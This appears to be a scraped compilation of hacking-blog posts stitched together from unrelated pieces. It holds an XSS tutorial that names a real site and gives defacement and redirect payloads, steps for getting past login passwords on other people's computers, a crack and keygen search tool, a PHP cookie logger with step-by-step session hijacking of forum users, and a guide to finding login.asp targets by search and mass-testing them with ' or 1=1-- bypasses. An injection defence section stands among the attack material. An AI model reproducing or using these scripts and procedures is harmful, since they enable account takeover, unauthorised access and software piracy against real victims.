Xss Cross Site Scripting may be classified in two types:

1.Persistent XSS

2.Non Persistent XSS

In order to demonstrate a XSS attack I will take an example of a website:

http://www.redwrappings.co.in

Checking the venerability

The simplest way to check the vulnerability is to enter the following code in the any web form present on the website

<script>alert(“XSS”)</script>

Once the attacker inserts the code A dialog box like the below one will appear:

Defacement

Now the attacker has found that the website is velnerable to an xss attack the attacker can do lots of damages to the website, The most common thing which the attacker will do is place his defacement image on that page showing that the website is hacked, For this purpose he will insert a code similar to the below one:

<html><body><IMG SRC=”http://site.com/yourDefaceIMAGE.png”></body></html>

Where http://site.com/yourDefaceIMAGE.png is the defacement image

Inserting Flash Videos

The attacker can also insert flash videos by entering the following code in any web form present on the website

Redirection

The attacker can also redirect the page to any particular page , In case if the hacker has managed to find XSS venerability in the a website like paypal.com or alertpay.com he can redirect that page to a Phisher Site(Fake login page) where the victim will loose his password, To redirect a an xssed page to another page the attacker will insert a code similar to the below one:

<script>window.open( “http://www.google.com/” )</script>

Stealing Cookies

Most of the attackers after finding a website venerable to xss will probably steal victims cookies to gain access to their account or private data this method is called Session hijacking, which is a detailed topic and I will be explaining in the later articles

Hope you have learned some XSS ,Feel free to ask if you have any problem regarding the above information

About the Author

This is a guest post by Rafay baloch. Rafay Baloch is a the founder of Rafay Hacking Articles and the writer of the book A Beginners guide To Ethical Hacking

Windows

Windows being very popular has a lot of programs available which can be used to hack the login password. One of the most successful  program is Ophcrack, and it is free. Ophcrack is based on Slackware, and uses rainbow tables to solve passwords up to 14 characters in length. The time required to solve a password? Generally 10 seconds. The expertise needed? None.

Simply download the Ophcrack ISO and burn it to a CD (or load it onto a USB drive via UNetbootin). Insert the CD into a machine you would like to gain access to, then press and hold the power button until the computer shuts down. Turn the computer back on and enter BIOS at startup. Change the boot sequence to CD before HDD, then save and exit.

The computer will restart and Ophcrack will be loaded. Sit back and watch as it does all the work for your. Write down the password it gives you, remove the disc, restart the computer, and log in as if it were you own machine.

You can download OphCrack from the following link:

http://ophcrack.sourceforge.net/

Linux

Linux is an operating system which is quickly gaining popularity in mainstream, but not so common that you’re likely to come across it. Though Mac and Linux are both based on Unix, it is easier to change the password in Linux than it is OS X.

To change the password, turn on the computer and press the ESC key when GRUB appears. Scroll down and highlight ‘Recovery Mode’ and press the ‘B’ key; this will cause you to enter ‘Single User Mode’.

You’re now at the prompt, and logged in as ‘root’ by default. Type ‘passwd’ and then choose a new password. This will change the root password to whatever you enter. If you’re interested in only gaining access to a single account on the system, however, then type ‘passwd username’ replacing ‘username’ with the login name for the account you would like to alter the password for.

Mac

Finally we take on Mac’s OS X which as we said earlier is based on Unix and is difficult to change password compared to Linux but nothing is  impossible to be hacked.

The easiest method would be to use Ophcrack on this also as it works with Mac and Linux in addition to Windows. However, there are other methods that can be used, as demonstrated below.

If the Mac runs OS X 10.4, then you only need the installation CD. Insert it into the computer, reboot. When it starts up, select UTILITIES > RESET PASSWORD. Choose a new password and then use that to log in.

If the Mac runs OS X 10.5, restart the computer and press COMMAND + S. When at the prompt, type:

fsck -fy

mount -uw /

launchctl load /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist

dscl . -passwd /Users/UserName newpassword

That’s it. Now that the password is reset, you can login.

Craagle is a free downloadable standalone meta search engine that allows users to search every sort of cracks, serials, keys, keygen and covers, without falling into annoying toolbars, pop-ups, spyware, ad-ware and mal-ware that the crack sites or search sites abundant with. It works by doing the searching the cracks, serials or album covers directly from Craagle program without the need to visit the websites. Craagle has added advantage of able to search for cover images or graphics for CD, DVD, audio, games and etc.

Craagle also supports usage of proxy server to bypass some sites that have Day Limit or daily usage limit. Craagle source code has over 100,000 characters (engine only, excluded GUI).

How to install?

There is no need to install the program as the exe is portable and can be run without any kind of installation process. To run the program just double click the craagle.exe file. To download click here.

How to search for cracks, serials or keygen in Craagle?

The user interface of Craagle is as follows:

Follow the steps:

1. Type the name of the software.
2. Select whether you want crack, serial or keygen.
3. You may also select a specific website you want to search.
4. Press Search.
5. Select the version of the software.
6. Right click and press Download to get the Key.
7. The Key will be displayed at the bottom as shown in the above figure.
8. Activate the software using the given key and Enjoy

Risks:

Craagle is detected by many antivirus and antispyware software as containing Adware, so use it at your own risk. When Craagle is installed, it creates the following files in the current folder: proxy.txt, Options.ini or Craagle.ini.

Crack Sites Supported:

• Cracks.Am
• KeyGen.Us
• AllCracks.Net
• Andr.Net,
• Crack.Ms
• Crackz.Ws
• CrackArchive.Com
• CrackDb.Com
• CrackzPlanet.Com
• CrackWay.Com
• MsCracks.Com
• CrackPortal.Com
• TheCracks.Us
• KeyGen.Ru

Serial Sites Supported:

• Seriall.Com
• FreeSerials.Com
• SerialSite.Com
• Serials.Ws
• Andr.Net
• SerialKey.Net
• SerialArchive.Com
• CrackzPlanet.Com
• MsCracks.Com
• CrackPortal.Com
• KeyGen.Name
• TheKeys.Ws
• FreeSerials.Ws
• FreeSerials.Spb.Ru
• Serial.220volt.Info
• SerialCodes.Net

Download

Link : http://www.easy-share.com/1905219519/Craagle-hungry-hackers.com.rar

Password : hungry-hackers.com

With its popularity grows the need of hacking into some ones Orkut account. We are getting so many comments on several pages in this website on how to break into an Orkut account; how to break Orkut password etc.  As always our humble reply, we don’t endorse hacking. We will not help anyone out to break into Orkut account nor provide any help if they have forgotten the passwords.

One thing people forget is that Orkut just like any other web based service store the password in encrypted format and just not possible to figure out the password even with the help of employees who are working there. How is it possible? Without going into technical details, let us explain things in a simple way.

When you register for a web based service you provide the password; one thing most trusted websites does is that it encrypt the password provided by you. The encryption is not reversible ie no one can decode the string back to the original format.

Suppose you have the password “MyPassword” this password is stored in the Orkut (or any other server) in encrypted format… something like – MyPassword => khkjhd877e8q78e8634but3874@63. There are several encryption techniques available like MD5, SHA etc. These encryption algorithms are not reversible ie you can convert MyPassword to khkjhd877e8q78e8634but3874@63 but khkjhd877e8q78e8634but3874@63 can’t be converted back to MyPassword.

When ever you enter the user name and password, the website convert your password into Md5 or sha or what ever it is and cross check.  So not even an Google employee can retrieve your password. Well, it can be reset.

Orkut passwords could be compromised only if you are

• Using a computer with a keylogger installed
• Using a computer affected with some Trojan or virus
• Using other websites where you have used the same password and which is not encrypted

So next time before thinking about hijacking the girl friends Orkut account, remember it’s not that easy.

Gmail Password Recovery is a tool that will search your PC for encrypted Gmail passwords, extract them, decrypt and decode them and display them in a readable format. The following locations are known to store Gmail passwords:

• Google Talk
• Gmail Notifier
• Google Desktop
• Picasa
• Google Photos Screensaver
• Internet Explorer
• Mozilla Firefox

This Cracking tool will work provided the password you are trying to recover is saved on your local PC under the current login and you are able to login automatically without entering your password. In any case, if you are trying to recover the password you have long forgotten, download Gmail Password Recovery.
[eminimall]
Note: The Passwords Shown in the Image have been Changed so Please Don’t Try it. They are just for Demonstration

Download Link:

http://w18.easy-share.com/1702541173.html

Injection attacks can be very easy to discover and exploit, but they can also be extremely obscure. The consequences can also run the entire range of severity, from trivial to complete system compromise or destruction. In any case, the use of external calls is quite widespread, so the likelihood of a web application having a command injection flaw should be considered high.

Shell Commands

Many web applications use operating system features and external programs to perform their functions. Sendmail is probably the most frequently invoked external program, but many other programs are used as well. When a web application passes information from an HTTP request through to the command line, it must be carefully scrubbed. This also applies when opening files in the file system. Otherwise, the attacker can inject special (meta) characters, malicious commands, or command modifiers into the information and the web application will blindly pass these on to the external system for execution.

SQL

SQL injection is a particularly widespread and dangerous form of attack. To exploit a SQL injection flaw, the attacker must find a parameter that the web application passes through to a database. By carefully embedding malicious SQL commands into the content of the parameter, the attacker can trick the web application into forwarding a malicious query to the database. These attacks are not difficult to attempt and more tools are emerging that scan for these flaws. The consequences are particularly damaging, as an attacker can obtain, corrupt, or destroy database contents.

Environments Affected

Every web application environment allows the execution of external commands such as system calls, shell commands, and SQL requests. The susceptibility of an external call to command injection depends on how the call is made and the specific component that is being called, but almost all external calls can be attacked if the web application is not properly coded.

Some environment specific considerations:

• MySQL – older mysql libraries only processes one statement at a time when you pass it a query. Newer mysql libraries (e.g., mysql in PHP) will process multiple SQL commands in one query
• Oracle – most Oracle client libraries support variable binding. This is the best way to avoid SQL injection.
• Perl – check for shell injection when you open a file if the filename is derived from user input

Examples:

• A malicious parameter could modify the actions taken by a system call that normally retrieves the current user’s file to access another user’s file (e.g., by including path traversal “../” characters as part of a filename request).

• Additional commands could be tacked on to the end of a parameter that is passed to a shell script to execute an additional shell command (e.g., “; rm -r *”) along with the intended command.

• SQL queries could be modified by adding additional ‘constraints’ to a where clause (e.g., “OR 1=1″) to gain access to or modify unauthorized data.

Example:

DELETE FROM CRITICALTABLE WHERE USER=’$VAR’

where the user enters

HACKER’ OR ’1′=’1

Notice the mismatched quotes! Inserting this into the SQL statement, we’d get:

DELETE FROM CRITICALTABLE WHERE USER=’BADGUY’ OR ’1′=’1′

This would delete all the information in the critical table.

How to Determine If You Are Vulnerable

The best way to determine if you are vulnerable to command line or SQL injection attacks is to search the source code for all calls to external resources (e.g., system, exec, fork, Runtime.exec, SQL queries, or whatever the syntax is for making requests to interpreters in your environment). Note that many languages have multiple ways to run external commands. Developers should review their code and search for all places where input from an HTTP request could possibly make its way into any of these calls. You should carefully examine each of these calls to be sure that the protection steps outlined below are followed.

How to Protect Yourself

The simplest way to protect against injection is to avoid accessing external interpreters wherever possible. For many shell commands and some system calls, there are language specific libraries that perform the same functions. Using such libraries does not involve the operating system shell interpreter, and therefore avoids a large number of problems with shell commands.

• Use bind variables where ever possible. If not, escape all user variables which be used in a SQL statement or on the command line.
• In Coldfusion, use variable binding by using the CFQueryParam Tag within your CFQuery tags.
• In Perl, prepare your statements using variable binding and then pass the parameters when executing the query:
  $cursor = $db->prepare(“DELETE FROM CRITICALTABLE WHERE USER=?”);
  $cursor->execute($user);
• Use pattern matching to verify user input is an expected value. If input is not what is expected, throw an error. Error messages should be generic.  
• Turn off/control debug messages to avoid giving an attacker potentially useful information.
• Database level: Limit access to the web account that is accessing the database.  Write procedures to insert records and update data rather than give the application direct access to the tables;  Limit application to READ-only access where possible – at user level as well as database level.
• Reuse previously tested code wherever possible.

For those calls that you must still employ, such as calls to backend databases, you must carefully validate the data provided to ensure that it does not contain any malicious content. You can also structure many requests in a manner that ensures that all supplied parameters are treated as data, rather than potentially executable content. The use of stored procedures or prepared statements will provide significant protection, ensuring that supplied input is treated as data. These measures will reduce, but not completely eliminate the risk involved in these external calls. You still must always validate such input to make sure it meets the expectations of the application in question.

Another strong protection against command injection is to ensure that the web application runs with only the privileges it absolutely needs to perform its function. So you should not run the webserver as root or access a database as DBADMIN, otherwise an attacker can abuse these administrative privileges granted to the web application. Some of the J2EE environments allow the use of the Java sandbox, which can prevent the execution of system commands.

If an external command must be used, any user information that is being inserted into the command should be rigorously checked. Mechanisms should be put in place to handle any possible errors, timeouts, or blockages during the call.

All output, return codes and error codes from the call should be checked to ensure that the expected processing actually occurred. At a minimum, this will allow you to determine that something has gone wrong. Otherwise, the attack may occur and never be detected.

The OWASP Filters project is producing reusable components in several languages to help prevent many forms of injection. OWASP has also released CodeSeeker, an application level firewall.

What is a CookieLogger?

A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.

Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …

Step 1: Save the notepad file from the link below and Rename it as Fun.gif:

Download it.

Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:

$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>

Step 3: Create a new Notepad File and Save it as logfile.txt

Step 4: Upload this file to your server

cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

http://0fees.net

Step 5: Go to the victim forum and insert this code in the signature or a post :

Download it.

Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.

Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.

Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.

Disclaimer: I don’t take Responsibility for what you do with this script, served for Educational purpose only. …

Here’s a short video in which Joshua Wright demonstrates how a Bluetooth headset can be hijacked, allowing audio to be captured or sent to the device:

Few users realize that Bluetooth headsets can be exploited granting a remote attacker the ability to record and inject audio through the headset while the device is not in an active call. SANS Institute author and senior instructor Joshua Wright demonstrates.

All that is necessary is knowing the device address, which can be easily sniffed, and the secret pin, which defaults to 0000. The headset audio is tapped while not in a call, so any room conversation the headset’s mic can pick up can potentially be listened to remotely.

To Download the software to Hack a Bluetooth Enabled Phone Click Here.

While the adoption of web applications for conducting online business has enabled companies to connect seamlessly with their customers, it has also exposed a number of security concerns stemming from improper coding. Vulnerabilities in web applications allow hackers to gain direct and public access to sensitive information (e.g. personal data, login credentials).

Web applications allow visitors to submit and retrieve data to/from a database over the Internet. Databases are the heart of most web applications. They hold data needed for web applications to deliver specific content to visitors and provide information to customers, suppliers etc.

SQL Injection is perhaps the most common web-application hacking technique which attempts to pass SQL commands through a web application for execution by the back-end database. The vulnerability is presented when user input is incorrectly sanitized and thereby executed.

Checking for SQL Injection vulnerabilities involves auditing your web applications and the best way to do it is by using automated SQL Injection Scanners. We’ve compiled a list of free SQL Injection Scanners we believe will be of a value to both web application developers and professional security auditors.

SQLIer – SQLIer takes a vulnerable URL and attempts to determine all the necessary information to exploit the SQL Injection vulnerability by itself, requiring no user interaction at all. Get SQLIer.

SQLbftools – SQLbftools is a collection of tools to retrieve MySQL information available using a blind SQL Injection attack. Get SQLbftools.

SQL Injection Brute-forcer – SQLibf is a tool for automatizing the work of detecting and exploiting SQL Injection vulnerabilities. SQLibf can work in Visible and Blind SQL Injection. It works by doing simple logic SQL operations to determine the exposure level of the vulnerable application. Get SQLLibf.

SQLBrute – SQLBrute is a tool for brute forcing data out of databases using blind SQL injection vulnerabilities. It supports time based and error based exploit types on Microsoft SQL Server, and error based exploit on Oracle. It is written in Python, uses multi-threading, and doesn’t require non-standard libraries. Get SQLBrute.

BobCat – BobCat is a tool to aid an auditor in taking full advantage of SQL injection vulnerabilities. It is based on AppSecInc research. It can list the linked severs, database schema, and allow the retrieval of data from any table that the current application user has access to. Get BobCat.

SQLMap – SQLMap is an automatic blind SQL injection tool, developed in python, capable to perform an active database management system fingerprint, enumerate entire remote databases and much more. The aim of SQLMap is to implement a fully functional database management system tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities. Get SQLMap.

Absinthe – Absinthe is a GUI-based tool that automates the process of downloading the schema and contents of a database that is vulnerable to Blind SQL Injection. Get Absinthe.

SQL Injection Pen-testing Tool – The SQL Injection Tool is a GUI-based utility designed to examine database through vulnerabilities in web-applications. Get SQL Injection Pen-testing tool.

SQID – SQL Injection digger (SQLID) is a command line program that looks for SQL injections and common errors in websites. It can perform the follwing operations: look for SQL injection in a web pages and test submit forms for possible SQL injection vulnerabilities. Get SQID.

Blind SQL Injection Perl Tool – bsqlbf is a Perl script that lets auditors retrieve information from web sites that are vulnerable to SQL Injection. Get Blind SQL Injection Perl Tool.

SQL Power Injection Injector – SQL Power Injection helps the penetration tester to inject SQL commands on a web page. It’s main strength is its capacity to automate tedious blind SQL injection with several threads. Get SQL Power Injection.

FJ-Injector Framwork – FG-Injector is a free open source framework designed to help find SQL injection vulnerabilities in web applications. It includes a proxy feature for intercepting and modifying HTTP requests, and an interface for automating SQL injection exploitation. Get FJ-Injector Framework.

SQLNinja – SQLNinja is a tool to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end database. Get SQLNinja.

Automagic SQL Injector – The Automagic SQL Injector is an automated SQL injection tool designed to help save time on penetration testing. It is only designed to work with vanilla Microsoft SQL injection holes where errors are returned. Get Automagic SQL Injector.

NGSS SQL Injector – NGSS SQL Injector exploit vulnerabilities in SQL injection on disparate database servers to gain access to stored data. It currently supports the following databases: Access, DB2, Informix, MSSQL, MySQL, Oracle, Sysbase. Get NGSS SQL Injector.

First SEARCH the following Keywords in Google or any Search Engine:

admin\login.asp
login.asp

with these two search string you will have plenty of targets to chose from…choose one that is Vulnerable

INJECTION STRINGS: How to use it?

This is the easiest part…very simple

On the login page just enter something like

user:admin (you dont even have to put this.)
pass:’ or 1=1–

or

user:’ or 1=1–
admin:’ or 1=1–

Some sites will have just a password so

password:’ or 1=1–

In fact I have compiled a combo list with strings like this to use on my chosen targets . There are plenty of strings in the list below. There are many other strings involving for instance UNION table access via reading the error pages table structure thus an attack with this method will reveal eventually admin U\P paths.

The one I am interested in are quick access to targets

PROGRAM

i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit of success with a combo list formatted this way. Yesteday I loaded 40 eastern targets with 18 positive hits in a few minutes how long would it take to go through 40 sites cutting and pasting each string

combo example:

admin:’ or a=a–
admin:’ or 1=1–

And so on. You don’t have to be admin and still can do anything you want. The most important part is example:’ or 1=1– this is our basic injection string

Now the only trudge part is finding targets to exploit. So I tend to search say google for login.asp or whatever

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:

http://www3.google.com/search?hl=en&ie=ISO…G=Google+Search

17,000 possible targets trying various searches spews out plent more

Now using proxy set in my browser I click through interesting targets. Seeing whats what on the site pages if interesting I then cut and paste URL as a possible target. After an hour or so you have a list of sites of potential targets like so

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

and so on. In a couple of hours you can build up quite a list because I don’t select all results or spider for log in pages. I then save the list fire up Ares and enter

1) A Proxy list
2) My Target IP list
3) My Combo list
4) Start.

Now I dont want to go into problems with users using Ares..thing is i know it works for me…

Sit back and wait. Any target vulnerable will show up in the hits box. Now when it finds a target it will spew all the strings on that site as vulnerable. You have to go through each one on the site by cutting and pasting the string till you find the right one. But the thing is you know you CAN access the site. Really I need a program that will return the hit with a click on url and ignore false outputs. I am still looking for it. This will saves quite a bit of time going to each site and each string to find its not exploitable.

There you go you should have access to your vulnerable target by now

Another thing you can use the strings in the urls were user=? edit the url to the = part and paste ‘ or 1=1– so it becomes

user=’ or 1=1– just as quick as login process

Combo List

There are lot of other variations of the Injection String which I cannot put on my blog because that is Illegal. If you are interested I can send it to you through Email. Just write in your email address in comment and I will send it to you as early as possible but you need to remain patient it may take 1 or 2 days.

As a result of a lot of requests for the list of SQL Injection String and due to lack of time on our behalf to respond to your Comments we have now decided to give the download link for the list of SQL Injection Strings. Now you just need to Subscribe to our RSS Feed via Email and get the Download link at the bottom of the Confirmation Email. Please don’t Forget to click on the Confirmation Link given in that Email.

Here is the form to Subscribe to our RSS feed via Email:

Happy Hunting